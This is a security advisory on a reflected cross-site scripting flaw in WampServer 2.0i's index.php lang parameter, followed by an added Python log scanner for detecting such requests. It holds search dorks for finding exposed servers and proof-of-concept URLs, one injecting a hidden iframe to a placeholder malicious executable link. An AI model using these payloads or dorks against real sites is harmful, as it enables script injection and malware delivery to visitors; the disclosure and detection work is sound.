WampServer version 2.0i suffers from a cross-site scripting vulnerability.
----------------------------------------------------------------
Title: WampServer 2.0i (index.php) Remote Cross Site Scripting Vulnerability
Summary: WampServer - Apache, PHP, MySQL on Windows
Product web page: https://www.wampserver.com
Current version: 2.0i
Vulnerability discovered by Gjoko "LiquidWorm" Krstic
Zero Science Lab - https://www.zeroscience.mk
liquidworm gmail com
26.01.2010
Advisory: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4926.php
----------------------------------------------------------------
Dork:
"WampServer - Donate - Anaska"
"WAMPSERVER Homepage"
PoC:
https://[site]/index.php?lang=%3Cscript%3Ealert%28%22ZSL%20Testingz%22%29%3C/script%3E
https://[site]/index.php?lang=%3Ciframe%20height=%220%22%20width=%220%22%20frameborder=%220%22%20src=%22https://[evil .exe link]%22%3E%3C/iframe%3E
//EOF
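
For defenders, the following added example (not part of the original advisory or of WampServer) scans Apache access-log lines for requests to index.php whose lang parameter is not a plain language code. It assumes legitimate values are short alphabetic codes such as "en" or "fr"; the log lines, function names and pattern are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Assumption: legitimate lang values are short alphabetic codes ("en", "fr").
LANG_OK = re.compile(r"[A-Za-z]{2,10}")
# Request line inside a common/combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = """\
192.0.2.10 - - [26/Jan/2010:10:00:01 +0100] "GET /index.php?lang=en HTTP/1.1" 200 5120
192.0.2.11 - - [26/Jan/2010:10:00:07 +0100] "GET /index.php?lang=%3Cscript%3Ealert%28%22ZSL%20Testingz%22%29%3C/script%3E HTTP/1.1" 200 5177
192.0.2.12 - - [26/Jan/2010:10:00:09 +0100] "GET /index.php?lang=%253Ciframe%2520height%253D%25220%2522%253E HTTP/1.1" 200 5150
192.0.2.13 - - [26/Jan/2010:10:00:12 +0100] "GET /phpinfo.php?lang=%3Cb%3E HTTP/1.1" 404 310
192.0.2.14 - - [26/Jan/2010:10:00:15 +0100] "GET /index.php HTTP/1.1" 200 5120
"""

def suspicious_lang_values(target):
    """Return decoded lang values on index.php that are not plain language codes."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/index.php"):
        return []
    hits = []
    for value in parse_qs(parts.query, keep_blank_values=True).get("lang", []):
        # parse_qs decodes once; decode again (bounded) to catch double encoding.
        for _ in range(3):
            decoded = unquote(value)
            if decoded == value:
                break
            value = decoded
        if not LANG_OK.fullmatch(value):
            hits.append(value)
    return hits

def scan(log_text):
    """Return (line_number, client_ip, decoded_value) for each suspicious request."""
    findings = []
    for number, line in enumerate(log_text.splitlines(), start=1):
        match = REQUEST.search(line)
        if not match:
            continue
        for value in suspicious_lang_values(match.group(1)):
            findings.append((number, line.split(" ", 1)[0], value))
    return findings

if __name__ == "__main__":
    for number, client, value in scan(SAMPLE_LOG):
        print(f"line {number}: {client} sent lang={value!r}")
```

The same allowlist idea applies server-side: accepting only known language codes for lang and HTML-encoding the value on output removes the reflection.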